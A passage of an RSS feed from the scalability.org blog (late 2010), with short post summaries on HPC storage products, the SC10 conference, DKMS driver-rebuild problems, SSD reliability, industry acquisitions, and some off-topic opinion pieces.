      <description>Basically we have changed the chassis we use to one providing better cooling, and better OS drive access. In the case of the JR4, we should have better backplane fault isolation, at the cost of a few more wires to deal with internally (e.g. shouldn&amp;rsquo;t impact customers at all). Costs will be about the same, but serviceability will be easier. All fans are hot swappable, as are power supplies, and disks, including OS drives.</description>
    </item>
    
    <item>
      <title>Treating partnerships as business investments</title>
      <link>https://blog.scalability.org/2010/12/treating-partnerships-as-business-investments/</link>
      <pubDate>Mon, 13 Dec 2010 21:26:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/treating-partnerships-as-business-investments/</guid>
      <description>We&amp;rsquo;ve had issues in the past with &amp;lsquo;partners&amp;rsquo; taking advantage of our willingness to work with them, in order to have everyone come out ahead &amp;hellip; the customer, the partner, and us. This approach to partnership means all sacrifice a little, but everyone wins. Unfortunately, it also requires that everyone behave in an honest manner and honor their agreements. We are treating all discount requests as partnership requests. A customer wants a lower price on something.</description>
    </item>
    
    <item>
      <title>M&amp;A:  Dell grabs Compellent</title>
      <link>https://blog.scalability.org/2010/12/ma-dell-grabs-compellent/</link>
      <pubDate>Mon, 13 Dec 2010 20:10:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/ma-dell-grabs-compellent/</guid>
      <description>I had an inkling that this might come to be. Compellent makes filer heads that connect to storage arrays on the back end. Units are thin provisioned with lots of tiering and migration bits built in. Compellent isn&amp;rsquo;t an HPC play. Really they are more an enterprise-y type of play. I do know a few Compellent people (hi Russ!), and the products will fill a hole in the Dell line. However, there are still other holes to fill, so I expect Dell to continue down its M&amp;amp;A path.</description>
    </item>
    
    <item>
      <title>fixing a few bugs in dust before release</title>
      <link>https://blog.scalability.org/2010/12/fixing-a-few-bugs-in-dust-before-release/</link>
      <pubDate>Mon, 13 Dec 2010 05:36:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/fixing-a-few-bugs-in-dust-before-release/</guid>
      <description>Hit a corner case that resulted in a strange DB entry. Fixing that, and the installation initrd, and the initramfs/initrd build. Expect to release tomorrow.</description>
    </item>
    
    <item>
      <title>Added some bandwidth to main site</title>
      <link>https://blog.scalability.org/2010/12/added-some-bandwidth-to-main-site/</link>
      <pubDate>Sun, 12 Dec 2010 17:04:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/added-some-bandwidth-to-main-site/</guid>
      <description>We just updated our company internet connection. About 3.5x better download speed, about 6x better upload speed. It&amp;rsquo;s on a multi-WAN router, with a second, different-technology path being slower and less expensive, but with a 5 second cutover. Something bad happens to one path, the other takes over. This happens seamlessly; most users won&amp;rsquo;t notice this as DNS is roundrobin&amp;rsquo;ed. This said, our multi-WAN router is now a bottleneck. I&amp;rsquo;ve been looking at replacing it with either a faster appliance machine based multi-WAN router, or a small Delta-V unit with enough NICs.</description>
    </item>
    
    <item>
      <title>Docs wiki back up</title>
      <link>https://blog.scalability.org/2010/12/docs-wiki-back-up/</link>
      <pubDate>Sun, 12 Dec 2010 16:49:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/docs-wiki-back-up/</guid>
      <description>That was annoying. The update/upgrade path effectively wrote over the old configs without telling me. Snapshot script is up, and we will set up for weekly snapshots, and then deletion of the same after 12 weeks. Did I mention that this was annoying? On another note, we&amp;rsquo;ve had requests to refine/update the documentation, and we are doing that now. This is a work in progress, always will be, but we expect the docs to get much better in short order.</description>
    </item>
    
    <item>
      <title>rethinking the documentation wiki underpinnings</title>
      <link>https://blog.scalability.org/2010/12/rethinking-the-documentation-wiki-underpinnings/</link>
      <pubDate>Thu, 09 Dec 2010 03:54:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/rethinking-the-documentation-wiki-underpinnings/</guid>
      <description>We updated the documentation server last week, and the wiki software, updated by the folks who write it, broke. I&amp;rsquo;ll try a few more things to fix it tomorrow/Friday, but at some point I have to question my choice of wiki software. If the open source version breaks like this with a simple yum update, I don&amp;rsquo;t have much faith that the closed source variant with more features won&amp;rsquo;t break. So I am looking into foundation/large group led efforts.</description>
    </item>
    
    <item>
      <title>back from my Texas trek and assorted bits</title>
      <link>https://blog.scalability.org/2010/12/back-from-my-texas-trek-and-assorted-bits/</link>
      <pubDate>Thu, 09 Dec 2010 03:39:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/back-from-my-texas-trek-and-assorted-bits/</guid>
      <description>Was in Dallas, College Station, and then Austin. I am starting to get concerned that hosting providers may not have the capability to work on machines beyond the level of popping out failed disks and replacing them. They appear unable to provide the level of service that our customer assured us they could provide. Went down there and saw some terrible things done to some power connectors.</description>
    </item>
    
    <item>
      <title>dust just built and installed its first module, successfully, without issue</title>
      <link>https://blog.scalability.org/2010/12/dust-just-built-and-installed-its-first-module-successfully-without-issue/</link>
      <pubDate>Sat, 04 Dec 2010 22:20:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/dust-just-built-and-installed-its-first-module-successfully-without-issue/</guid>
      <description>A few more things to do &amp;hellip; we need a &amp;ldquo;make clean&amp;rdquo; like thing, and maybe a &amp;ldquo;make prepare&amp;rdquo; like thing. And we need to trigger a mkinitrd at the end when requested. Major things are the init.d script, but all it does is call a
Yeah, we are trying to make this really simple. Really really simple. And make sure it works. Really works. Here is output with the &amp;ndash;generate and &amp;ndash;debug options.</description>
    </item>
    
    <item>
      <title>OT [Economy]: So what should we think about this?</title>
      <link>https://blog.scalability.org/2010/12/ot-economy-so-what-should-we-think-about-this/</link>
      <pubDate>Sat, 04 Dec 2010 17:38:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/ot-economy-so-what-should-we-think-about-this/</guid>
      <description>I saw this today linked from DrudgeReport. In it we see a graph of auto company financing arms borrowing from the US Federal Reserve. These are lending institutions. During the credit crisis (and I&amp;rsquo;ll argue now as well), credit dried up. Banks wouldn&amp;rsquo;t loan money. We ran into this ourselves a number of times. Required some creative action on our part. Not everyone was so lucky. But we are small, and not impacting a big part of the economy.</description>
    </item>
    
    <item>
      <title>Where we&#39;ve been and where we are going</title>
      <link>https://blog.scalability.org/2010/12/where-weve-been-and-where-we-are-going/</link>
      <pubDate>Sat, 04 Dec 2010 16:22:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/where-weve-been-and-where-we-are-going/</guid>
      <description>Last year around this time, I wrote a long set of posts on HPC in the first decade of the millennium. Posts start here (there are 7). I am gathering some of my thoughts together for an article. It&amp;rsquo;s been an interesting year, with changes coming in both continuous and discontinuous (creative destructive) manners. We do live in interesting times, and I&amp;rsquo;ll try to detail what directions I see us going in.</description>
    </item>
    
    <item>
      <title>Are expectations being set properly?</title>
      <link>https://blog.scalability.org/2010/12/are-expectations-being-set-properly/</link>
      <pubDate>Sat, 04 Dec 2010 16:13:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/are-expectations-being-set-properly/</guid>
      <description>This past week, I looked over a set of proposals from some academic groups. One of these proposals was attempting to budget for a particular design. What I noticed here was a tendency to do something &amp;hellip; well &amp;hellip; that badly misstates the actual costs of things, substituting something easy to find with no regard for the real cost of implementing the service. At the end of the day, IT is about providing processing, storage, and data interchange in the service of a task that can make effective use of the resources.</description>
    </item>
    
    <item>
      <title>dust shaping up nicely</title>
      <link>https://blog.scalability.org/2010/12/dust-shaping-up-nicely/</link>
      <pubDate>Sat, 04 Dec 2010 15:52:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/dust-shaping-up-nicely/</guid>
      <description>Hooking in some execution management bits. Most everything else is working. I could skip the fancy execution management, and just fork, but I want to be able to do a better job of logging and capturing output/signals. More to the point, with the bits I&amp;rsquo;ve got in place now, dust should be able to do the builds in parallel (everyone say &amp;ldquo;ooh&amp;rdquo; now). The only impediment to this could be RPM if you use it here.</description>
    </item>
    
    <item>
      <title>... and the hits keep on coming ...</title>
      <link>https://blog.scalability.org/2010/12/and-the-hits-keep-on-coming/</link>
      <pubDate>Fri, 03 Dec 2010 18:22:25 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/and-the-hits-keep-on-coming/</guid>
      <description>Our documentation site is based upon wiki software from Mindtouch. I&amp;rsquo;ve liked their interface, it isn&amp;rsquo;t bad at all. It allows us to tier our content access, which is very important for our support models. In an effort to keep the site up to date, I did a
yum -y update  and it went through and updated. Including the wiki. Unfortunately, the new software has some terminal breakage. So, until we can unwind the breakage (or reform the site), the site will be down.</description>
    </item>
    
    <item>
      <title>Disappointment on a Friday</title>
      <link>https://blog.scalability.org/2010/12/disappointment-on-a-friday/</link>
      <pubDate>Fri, 03 Dec 2010 13:47:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/disappointment-on-a-friday/</guid>
      <description>We work very hard for our customers. We take lots of lumps for our suppliers. It&amp;rsquo;s our boxen, so if their stuff occasionally fails in our boxen &amp;hellip; well it&amp;rsquo;s obviously our fault. Right? I am not disclaiming responsibility &amp;hellip; we take ownership of every problem. So now imagine you are a customer, and you have a vendor who sends you (proactively) multiple sets of replacement SSDs. Walks you through the process of swapout.</description>
    </item>
    
    <item>
      <title>Twitter Updates for 2010-12-03</title>
      <link>https://blog.scalability.org/2010/12/twitter-updates-for-2010-12-03/</link>
      <pubDate>Fri, 03 Dec 2010 11:05:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/twitter-updates-for-2010-12-03/</guid>
      <description>* Strange personality traits: for some reason, I like listening to techno stuff while coding, and death/thrash metal while quoting ... hmmm [#](http://twitter.com/sijoe/statuses/10477947920060417) * Just read the arsenic bits. Now only if we can get gallium involved, my dissertation could have ... er ... applicability to something ... [#](http://twitter.com/sijoe/statuses/10478276933844993)  Powered by Twitter Tools</description>
    </item>
    
    <item>
      <title>The beginnings of dust ...</title>
      <link>https://blog.scalability.org/2010/12/the-beginnings-of-dust/</link>
      <pubDate>Thu, 02 Dec 2010 05:15:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/the-beginnings-of-dust/</guid>
      <description>So, as you might have seen from previous posts &amp;hellip; I couldn&amp;rsquo;t fix what was broke in DKMS. We have some customers that insist upon the functionality, and we can&amp;rsquo;t fix the tool. So, rather than trying to force them to rerun our driver update scripts, we are automating the process. The idea is to make the whole process as easy as possible. Most of the management bits are done, the build bits come tomorrow.</description>
    </item>
    
    <item>
      <title>a plea for sanity in driver module versioning</title>
      <link>https://blog.scalability.org/2010/12/a-plea-for-sanity-in-driver-module-versioning/</link>
      <pubDate>Thu, 02 Dec 2010 04:52:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/a-plea-for-sanity-in-driver-module-versioning/</guid>
      <description>Imagine you are working on a tool to figure out some driver module bits. Now imagine you need to parse driver version info bits. Imagine, much to your chagrin, you discover that &amp;hellip; well &amp;hellip; there is nothing close to a standard nomenclature. Imagine your horror thinking about all those hours you wasted on the clever &amp;ndash;sanity switch which would sanity check what you have against whats in there. Now imagine being grumpy about this.</description>
    </item>
    
    <item>
      <title>SC10 video is up</title>
      <link>https://blog.scalability.org/2010/12/sc10-video-is-up/</link>
      <pubDate>Wed, 01 Dec 2010 13:36:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/12/sc10-video-is-up/</guid>
      <description>At InsideHPC, you can see me at the end of Wednesday night, trying to string words together sitting next to Rich Brueckner. Video turned out good. The laptop is my box (dude, I got a Dell!), and the little white thingy on the right with the blinking LED is the network connection. SC10 is a great place for supercomputing, and a terrible place for wifi. I find this curious &amp;hellip; that we HPC types can&amp;rsquo;t seem to stand up wifi that scales to 14k people &amp;hellip; :) The siCluster-NAS demo was done remotely (this is a good model for SC &amp;hellip; making me think &amp;hellip;).</description>
    </item>
    
    <item>
      <title>I&#39;ve come to the conclusion that DKMS is broke</title>
      <link>https://blog.scalability.org/2010/11/ive-come-to-the-conclusion-that-dkms-is-broke/</link>
      <pubDate>Tue, 30 Nov 2010 22:03:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/11/ive-come-to-the-conclusion-that-dkms-is-broke/</guid>
      <description>After installing DKMS enabled drivers, and watching them not rebuild correctly on an update. At this point I think it&amp;rsquo;s worth replacing DKMS with something that does work.</description>
    </item>
    
    <item>
      <title>Seeing strong demand for large memory systems</title>
      <link>https://blog.scalability.org/2010/11/seeing-strong-demand-for-large-memory-systems/</link>
      <pubDate>Sun, 28 Nov 2010 14:45:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/11/seeing-strong-demand-for-large-memory-systems/</guid>
      <description>We have multiple customers asking for systems with Intel Xeon 3+ GHz cores and 512+ GB of RAM. Not just in financial services, but in engineering (NVH and other computing). Interesting development, and it&amp;rsquo;s nice to see this interest. It doesn&amp;rsquo;t hurt these large computing systems to have huge pipes to IO as well. This is a welcome development for us.</description>
    </item>
    
    <item>
      <title>OT: the theater keeps getting more absurd</title>
      <link>https://blog.scalability.org/2010/11/ot-the-theater-keeps-getting-more-absurd/</link>
      <pubDate>Wed, 24 Nov 2010 13:42:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/11/ot-the-theater-keeps-getting-more-absurd/</guid>
      <description>Like many other things today, this is a comedic horror show. It&amp;rsquo;s god-awful, but you just can&amp;rsquo;t stop watching, and shaking your head. Apparently 70+% of US citizens want Israeli style airport security &amp;hellip; which &amp;hellip; curiously &amp;hellip; works well. What we get instead is this. Scanning someone &amp;hellip; who is entering the country, after having flown into the country? Really? What &amp;hellip; they might bring nail clippers in and pollute our hotel rooms with dropped clippings?</description>
    </item>
    
    <item>
      <title>Power outage at day job</title>
      <link>https://blog.scalability.org/2010/11/power-outage-at-day-job-2/</link>
      <pubDate>Tue, 23 Nov 2010 16:32:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/11/power-outage-at-day-job-2/</guid>
      <description>Running the main server on the generator (UPS connected). Gotta love DTE. Was down this morning, came back, of course lots of work to get done. Then we heard a big bang. Lights flickered and went down. Oddly, one of our circuits is live. The rest aren&amp;rsquo;t, but one is. Found it as the coffeemaker light was on. Sheesh. Will probably set up a backup site on the same machine that runs this site.</description>
    </item>
    
    <item>
      <title>Interesting reading on SSD reliability</title>
      <link>https://blog.scalability.org/2010/11/interesting-reading-on-ssd-reliability/</link>
      <pubDate>Tue, 23 Nov 2010 06:32:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/11/interesting-reading-on-ssd-reliability/</guid>
      <description>Been researching this more. The questions I am asking now are: are the MTBF numbers believable? Are there bad batches of NAND chips &amp;hellip; SLC, MLC? What failure rates do people see with SLC? We have seen failures in both SLC and MLC units. MLC is generally indicated to be less reliable than SLC.
I am specifically looking for failure information. What I am finding is concerning me. Generally, among all controller chips out there, there seem to be a number of people reporting sudden failures in 2-3 month windows.</description>
    </item>
    
    <item>
      <title>More M&amp;A:  Novell sold itself to Attachmate</title>
      <link>https://blog.scalability.org/2010/11/more-ma-novell-sold-itself-to-attachmate/</link>
      <pubDate>Tue, 23 Nov 2010 04:56:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/11/more-ma-novell-sold-itself-to-attachmate/</guid>
      <description>This is interesting. This is a new line of business for Attachmate; they aren&amp;rsquo;t in OSes, NOS, and other things directly related to this. I don&amp;rsquo;t quite understand the rationale behind the acquisition. I need to look at that one more. Best guess is that Attachmate is really a holding company with a loose collection of holdings, with no significant overlap. In conjunction with this, Novell sold 882 patents to Microsoft.</description>
    </item>
    
    <item>
      <title>Expectations set incorrectly?</title>
      <link>https://blog.scalability.org/2010/11/expectations-set-incorrectly/</link>
      <pubDate>Tue, 23 Nov 2010 03:23:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/11/expectations-set-incorrectly/</guid>
      <description>So I wonder if we should be thinking that SSDs shouldn&amp;rsquo;t fail as often as spinning disk. That is, SSDs don&amp;rsquo;t have moving parts, and so are much less subject to mechanical wear and tear as they are used. But they do fail. Every brand of SSDs we have used, every one, including Intel, Corsair, RiData, Mushkin &amp;hellip; every one, we have seen failures. Some have been absolutely ridiculous in scope (Corsair), some have been mostly due to changes in their mechanical design (RiData) as well as unit failures.</description>
    </item>
    
    <item>
      <title>Wrasslin with DKMS</title>
      <link>https://blog.scalability.org/2010/11/wrasslin-with-dkms/</link>
      <pubDate>Mon, 22 Nov 2010 16:26:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/11/wrasslin-with-dkms/</guid>
      <description>Turns out Centos isn&amp;rsquo;t quite exactly equivalent to Redhat, as far as DKMS goes. Don&amp;rsquo;t ask me why, I am having a hard time figuring it out right now. We are trying to not re-invent a wheel and use the Dell developed DKMS system. We want driver rebuilds to trigger on kernel updates when needed. But &amp;hellip; while it works correctly with a simple dkms.conf on Centos 5.5, the same thing doesn&amp;rsquo;t seem to work on RHEL 5.</description>
    </item>
    
    <item>
      <title>siCluster-NAS was announced at SC10 ... but ...</title>
      <link>https://blog.scalability.org/2010/11/sicluster-nas-was-announced-at-sc10-but/</link>
      <pubDate>Sat, 20 Nov 2010 20:36:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/11/sicluster-nas-was-announced-at-sc10-but/</guid>
      <description>[updated] Its up on InsideHPC, and showing up on the PR sites now. One of these days I&amp;rsquo;m gonna learn to do this stuff earlier &amp;hellip; &amp;hellip; looks like it didn&amp;rsquo;t make it out some of the PR and news sites (I submitted it late to InsideHPC, and Rich Brueckner was positively inundated with bits, so its possible it may show up later). So the PR is here, and we&amp;rsquo;ll have the reseller/contact list up shortly.</description>
    </item>
    
    <item>
      <title>OT:  theater of the absurd</title>
      <link>https://blog.scalability.org/2010/11/ot-theater-of-the-absurd/</link>
      <pubDate>Sat, 20 Nov 2010 20:16:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/11/ot-theater-of-the-absurd/</guid>
      <description>[update after the fold] Having just been through travel to SC10, and been put through the body scanner, the metal scanner, but thankfully no pat downs, I did see some of the more &amp;hellip; aggressive &amp;hellip; inspections in the beginning phases. Bruce Schneier has a long post on this, including many many links.
I am not sure I want my family to go through this. I am not happy with it, and to be frank, I remain unconvinced that this is better than the null hypothesis, that is, not doing these invasive searches.</description>
    </item>
    
    <item>
      <title>Mergers and Acquisitions:  Isilon eaten by EMC</title>
      <link>https://blog.scalability.org/2010/11/mergers-and-acquisitions-isilon-eaten-by-emc/</link>
      <pubDate>Sat, 20 Nov 2010 16:27:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/11/mergers-and-acquisitions-isilon-eaten-by-emc/</guid>
      <description>Yes, it&amp;rsquo;s old news now &amp;hellip; announced Tuesday morning, and this is Saturday. Isilon, a maker of scale out NAS units (which hadn&amp;rsquo;t been spectacularly profitable &amp;hellip; they had some issues in the recent past) has a growing business in Bio-IT and other areas. They are a player in HPC storage for clusters. EMC hasn&amp;rsquo;t really been a player in HPC for a while. In the past, some groups have tried to use EMC as the storage provider for HPC, but the economics and performance aren&amp;rsquo;t a good fit for most of their product line.</description>
    </item>
    
    <item>
      <title>A fork in the Lustre road?</title>
      <link>https://blog.scalability.org/2010/11/a-fork-in-the-lustre-road/</link>
      <pubDate>Sat, 20 Nov 2010 16:01:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/11/a-fork-in-the-lustre-road/</guid>
      <description>I&amp;rsquo;ve been waiting a while to post this, to see how things develop. Lustre does indeed have a future. The question is, will Oracle cede control over Lustre, or will it be forked by OpenSFS/WhamCloud/Xyratex? A few short months ago, its future was cloudy at best. Oracle isn&amp;rsquo;t seemingly interested in HPC, except where it matters for the database side of things. So most things HPC specific (with little possible alternative use cases) have been given the heave-ho.</description>
    </item>
    
    <item>
      <title>On the state of Microsoft&#39;s HPC effort</title>
      <link>https://blog.scalability.org/2010/11/on-the-state-of-microsofts-hpc-effort/</link>
      <pubDate>Fri, 19 Nov 2010 18:59:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/11/on-the-state-of-microsofts-hpc-effort/</guid>
      <description>Reports were in that a Windows based system was able to crack the 1PF barrier, but that the same system running Linux was faster. Kudos to Microsoft for this &amp;hellip; but I have to ask &amp;hellip; really &amp;hellip; if this statement from Bill Hilf is true:
then why is Microsoft competing in the stratospheric regime of performance if it&amp;rsquo;s not trying to be there? I see a fundamental disconnect between actions and words.</description>
    </item>
    
    <item>
      <title>Semi-OT: When the engine of the economy sputters ...</title>
      <link>https://blog.scalability.org/2010/11/semi-ot-when-the-engine-of-the-economy-sputters/</link>
      <pubDate>Fri, 19 Nov 2010 14:44:57 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/11/semi-ot-when-the-engine-of-the-economy-sputters/</guid>
      <description>Sort of like Ayn Rand&amp;rsquo;s excellent Atlas Shrugged, when eventually enough barriers to building companies and forming wealth occur, they will stop trying. See the WSJ article about this. This impacts HPC, as smaller folks with good products, and awesome future products now see enough uncertainty that many are hedging their bets. Which means not taking as many risks. Or hiring as many people. Funny how that economy thing works. Jobs are created when entrepreneurs take risks that result in capital formation.</description>
    </item>
    
    <item>
      <title>SC10 wrap up podcast</title>
      <link>https://blog.scalability.org/2010/11/sc10-wrap-up-pod-cast/</link>
      <pubDate>Thu, 18 Nov 2010 04:30:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/11/sc10-wrap-up-pod-cast/</guid>
      <description>I&amp;rsquo;ve been behind on podcast viewing. Way behind. So today I was Rich Brueckner&amp;rsquo;s sidekick (cue sidekick music) on the InsideSC10 Recap. Link above takes you to the site, please do click it, as InsideHPC is in part supported by advertising revenue (scalability.org is a self funded effort). Video is also on YouTube, and you can see it here:
Yes, I did almost say &amp;ldquo;develop that technology&amp;rdquo; when talking about people.</description>
    </item>
    
    <item>
      <title>SC10: the wind down</title>
      <link>https://blog.scalability.org/2010/11/sc10-the-wind-down/</link>
      <pubDate>Thu, 18 Nov 2010 02:36:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/11/sc10-the-wind-down/</guid>
      <description>The conference is winding down. Tuesday was good, Wednesday was wild. Non-stop. I didn&amp;rsquo;t have a free moment. This was a good show. We got the siCluster-NAS formally launched (for less than $1000/usable TB with scalable bandwidth, we think it is pretty good). We got some nice financial services demos up and running on the siCluster-NAS. We didn&amp;rsquo;t spend too much money to set up and run the demos. Tomorrow, Green-HPC gets announced (and I think Top500).</description>
    </item>
    
    <item>
      <title>siCluster and JackRabbit benchmark report slightly delayed</title>
      <link>https://blog.scalability.org/2010/11/sicluster-and-jackrabbit-benchmark-report-slightly-delayed/</link>
      <pubDate>Tue, 16 Nov 2010 13:30:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/11/sicluster-and-jackrabbit-benchmark-report-slightly-delayed/</guid>
      <description>My bad, we&amp;rsquo;ve been very busy. I had expected to have them done by show time, and of course, I haven&amp;rsquo;t had time. We have all the data, I have to sit down with it, finish crunching it, and put it into our document. It will be done soon. Then we&amp;rsquo;ll post it on our web site and you can pull it down. siCluster benchmark report will have (older) results from a GlusterFS set of tests.</description>
    </item>
    
    <item>
      <title>SC10 day T&#43;1: first full day of conference</title>
      <link>https://blog.scalability.org/2010/11/sc10-day-t1-first-full-day-of-conference/</link>
      <pubDate>Tue, 16 Nov 2010 13:22:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/11/sc10-day-t1-first-full-day-of-conference/</guid>
      <description>Starting this post in the morning. I&amp;rsquo;d like to see us get some traffic going to the booth #4517 right next to the Ethernet Alliance booth. So how can we generate traffic &amp;hellip; sorry no extraordinarily attractive obviously non-geek humans there &amp;hellip; well, there&amp;rsquo;s product interest (we are announcing siCluster-NAS this morning), there&amp;rsquo;s swag (courtesy of Intel), and some Scalable Informatics pens. How about a quid pro quo. Come by and engage with us, and we&amp;rsquo;ll reciprocate.</description>
    </item>
    
    <item>
      <title>SC10 day 0: The beowulf bash, and bacon wrapped servers</title>
      <link>https://blog.scalability.org/2010/11/sc10-day-0-the-beowulf-bash-and-bacon-wrapped-servers/</link>
      <pubDate>Tue, 16 Nov 2010 13:11:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/11/sc10-day-0-the-beowulf-bash-and-bacon-wrapped-servers/</guid>
      <description>Doug says, &amp;ldquo;hey Joe, let&amp;rsquo;s drive, so we don&amp;rsquo;t get soaked, and have better control over our leaving time.&amp;rdquo; Which makes sense. So into the GPS went the name, out came a set of directions, which we followed. The thing about GPSes &amp;hellip; well &amp;hellip; the data can tell you about where things are, from a driving perspective. But having signs up helps. Otherwise, you wind up walking in what amounted to a semicircle for 15 minutes in a blowing rain, and getting the uncovered sections of your clothes inundated with water.</description>
    </item>
    
    <item>
      <title>SC10 day T-0:  the gala begins</title>
      <link>https://blog.scalability.org/2010/11/sc10-day-t-0-the-gala-begins/</link>
      <pubDate>Tue, 16 Nov 2010 01:09:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/11/sc10-day-t-0-the-gala-begins/</guid>
      <description>We are in booth 4517-ish, right by the Ethernet Alliance in the Intel Channel Partner booth. Come by and say hello! We have a nice quick Kdb+ demo, and will be talking about our siCluster-NAS scale out NAS product.</description>
    </item>
    
    <item>
      <title>SC10 day T-1: the arrival</title>
      <link>https://blog.scalability.org/2010/11/sc10-day-t-1-the-arrival/</link>
      <pubDate>Sun, 14 Nov 2010 23:53:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/11/sc10-day-t-1-the-arrival/</guid>
      <description>We got in this morning. Security was &amp;hellip; er &amp;hellip; security. I feel like the TSA should buy me a nice dinner. And maybe call sometime (feeble attempt at humor on my part). One gets the feeling that they are actively discouraging air travel. Got into the McKendrick-Breaux house, a nice B&amp;amp;B very close to the convention center, and costing a similar amount to hotels there. Nice location, very close.</description>
    </item>
    
    <item>
      <title>SC10 day T-2:  The preparations</title>
      <link>https://blog.scalability.org/2010/11/sc10-day-t-2-the-preparations/</link>
      <pubDate>Sat, 13 Nov 2010 16:44:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/11/sc10-day-t-2-the-preparations/</guid>
      <description>We are going to be there, in the Intel Channel Partner Pavilion (will find booth number and post it) on Monday and Tuesday. We have lots of work to do &amp;hellip; and it&amp;rsquo;s Saturday. First, we have to finish up the siCluster-NAS bits. Expect PR on Monday (will send it to InsideHPC and try to get it into the SC10 PR stream). Need to finish web page and handouts for it.</description>
    </item>
    
    <item>
      <title>On value</title>
      <link>https://blog.scalability.org/2010/11/on-value/</link>
      <pubDate>Fri, 12 Nov 2010 03:24:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/11/on-value/</guid>
      <description>What precisely is it people buy &amp;hellip; is it a box full of parts they assemble themselves, or a service, or a turnkey solution? What they buy comes fundamentally from where they believe value to be. The buyer of boxes full of parts has value pegged to the inverse of price. The lower the price, the higher the value. The buyer of a service or a solution is looking for a specific set of expectations to be met.</description>
    </item>
    
    <item>
      <title>Amusing PR</title>
      <link>https://blog.scalability.org/2010/11/amusing-pr/</link>
      <pubDate>Fri, 12 Nov 2010 03:10:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/11/amusing-pr/</guid>
      <description>Every now and then we see people declare themselves to be the king of the hill in performance or in some other metric of relevance. Then come the theoretical max numbers or their measurements. As a reminder, our single JR4 units are sustaining 2.3+ GB/s to and from disk for TB sized files, and have QDR IB type connections (as well as 10GbE and GbE) available. Lots of bandwidth per box.</description>
    </item>
    
    <item>
      <title>What a set of weeks ... wow</title>
      <link>https://blog.scalability.org/2010/11/what-a-set-of-weeks-wow/</link>
      <pubDate>Fri, 12 Nov 2010 03:01:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/11/what-a-set-of-weeks-wow/</guid>
      <description>We delivered our first siCluster-NAS unit to a government customer. Built it and delivered it. In 8 days. From parts. Just got back this afternoon. SC10 coming up, and we will be there. Intel Partner Pavilion, Monday and Tuesday. Up to meet with people on Wednesday/Thursday, so ping me if you&amp;rsquo;d like to get together.</description>
    </item>
    
    <item>
      <title>One of them days ...</title>
      <link>https://blog.scalability.org/2010/11/one-of-them-days/</link>
      <pubDate>Thu, 04 Nov 2010 20:30:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/11/one-of-them-days/</guid>
      <description>Ever have a day like this:
Me: You need the wheels on the car to be able to drive it off the lot.
Them: Nonsense. They cost extra. We don&amp;rsquo;t need them.
(hours/days/weeks/months later)
Them: How come you didn&amp;rsquo;t tell us we need wheels?
All I can think to do is to blink rapidly without saying anything.</description>
    </item>
    
    <item>
      <title>User load well above 10</title>
      <link>https://blog.scalability.org/2010/11/user-load-well-above-10/</link>
      <pubDate>Thu, 04 Nov 2010 14:52:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/11/user-load-well-above-10/</guid>
      <description>this is why I haven&amp;rsquo;t been doing any posting &amp;hellip; preparing for SC10, building a new siCluster-NAS (scale out NAS unit) for a government customer, dealing with shipping units to Chile, new orders for other units &amp;hellip;, meeting with partners and prospective partners, generating quotes like mad &amp;hellip; Yeah &amp;hellip; busy &amp;hellip; :)</description>
    </item>
    
    <item>
      <title>Twitter Updates for 2010-11-03</title>
      <link>https://blog.scalability.org/2010/11/twitter-updates-for-2010-11-03/</link>
      <pubDate>Wed, 03 Nov 2010 11:05:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2010/11/twitter-updates-for-2010-11-03/</guid>
      <description>* Is #[twitter](http://search.twitter.com/search?q=%23twitter) broke? I keep getting &amp;quot;internal server errors&amp;quot; [#](http://twitter.com/sijoe/statuses/29523254356) * Congrats @[RickForMI](http://twitter.com/RickForMI) ... early call, but it looks like you are the new governor of the state of Michigan [#](http://twitter.com/sijoe/statuses/29523344742)  Powered by Twitter Tools</description>
    </item>
    
    <item>
      <title>OT: It&#39;s rare that I see an economic analysis so spot on ...</title>
